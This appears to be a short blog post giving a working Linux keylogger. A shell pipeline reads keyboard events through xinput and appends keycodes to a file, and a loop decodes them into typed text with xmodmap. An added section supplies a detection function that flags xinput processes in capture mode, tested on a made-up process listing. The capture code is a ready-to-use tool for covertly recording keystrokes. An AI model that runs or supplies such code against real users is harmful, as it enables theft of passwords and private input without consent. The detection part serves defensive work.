Tuesday, October 8, 2013

Keylogger for Linux

Dump the keystrokes according to their keycodes to a file called 'dump':
stdbuf -o0 xinput test 11 | stdbuf -o0 awk '/ press /' | stdbuf -o0 awk -F' ' '{print $3}' >> dump

Here, 11 is the xinput device id of the keyboard (the standard AT translated keyboard on my machine). You can find this number in the output of xinput --list.

Now decode them according to the xmodmap table:

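for line in $(cat dump)
do
    # Row (keycode - 7) of xmodmap -pke is the entry for this keycode; field 4 is its keysym
    xpr="$(xmodmap -pke | awk "NR==$line-7" | awk '{ print $4}')"
#    echo $xpr
    case "$xpr" in
        Return) echo -e "\n" >> out2 ;;
        space)  echo " " >> out2 ;;
        *)      echo -n "$xpr" >> out2 ;;
    esac
    echo -n " " >> out2
done
echo -e "\n" >> out2
cat out2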

You might need to edit this script depending on the output of your xmodmap -pke. For example, the expression NR==$line-7 may need modification, since my xmodmap -pke starts from keycode 8 and follows the natural order throughout.
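
The capture above runs as an ordinary xinput process in the user's X session, so it shows up in the process table. As an added example (not part of the original post), the following function flags xinput processes started in test or test-xi2 mode; the function name find_xinput_capture, the "PID USER ARGS" input format and the sample listing are assumptions made for illustration.

```shell
#!/usr/bin/env bash
# Added example: spot processes that are reading input events through xinput.
# Live use:  ps -eo pid=,user=,args= | find_xinput_capture

# Reads "PID USER ARGS..." lines on stdin and prints "PID USER MODE TARGET"
# for every xinput process running in test or test-xi2 mode.
find_xinput_capture() {
    awk '
    {
        n = split($3, path, "/")          # executable, with or without a path
        if (path[n] != "xinput") next     # only the command itself, not arguments
        mode = $4
        sub(/^-+/, "", mode)              # xinput accepts "test" and "--test"
        if (mode != "test" && mode != "test-xi2") next
        target = ""
        for (i = 5; i <= NF; i++)
            target = target (target == "" ? "" : " ") $i
        print $1, $2, mode, (target == "" ? "(no device given)" : target)
    }'
}

# Constructed sample process listing (not real output).
SAMPLE_PS=' 1412 alice xinput test 11
 1413 alice awk / press /
 2207 bob /usr/bin/xinput --test-xi2 --root
 2290 alice xinput --list
 2301 carol grep xinput test notes.txt'

# Only PIDs 1412 and 2207 are reported: --list is not a capture mode, and
# "xinput test" appearing as arguments to grep is ignored.
printf '%s\n' "$SAMPLE_PS" | find_xinput_capture
```

Matching on the command line only covers the xinput tool itself, so treat a hit as one signal to investigate rather than a complete check of who is reading input on the X server.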